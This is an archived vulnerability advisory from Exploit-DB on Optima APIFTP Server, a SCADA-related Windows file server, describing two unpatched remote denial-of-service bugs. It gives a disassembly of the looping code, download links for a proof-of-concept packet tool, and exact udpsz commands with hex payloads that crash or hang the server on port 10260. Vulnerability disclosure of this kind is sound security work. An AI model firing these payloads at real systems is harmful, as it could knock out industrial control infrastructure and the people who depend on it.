optima apiftp server 1.5.2.13 - Multiple Vulnerabilities

EDB-ID:

18112


Platform:

Windows

Published:

2011-11-14

#######################################################################

                             Luigi Auriemma

Application:  Optima APIFTP Server
              http://www.optimalog.com/home.html
Versions:     <= 1.5.2.13
Platforms:    Windows
Bugs:         A] NULL pointer
              B] endless loop
Exploitation: remote
Date:         13 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.


#######################################################################

=======
2) Bugs
=======

---------------
A] NULL pointer
---------------

NULL pointer exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution that will lead to a stack exaustion after
some seconds and the termination of the server.


---------------
B] endless loop
---------------

Endless loop with CPU at 100% caused by incomplete packets:

  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8     ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18112.zip

A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################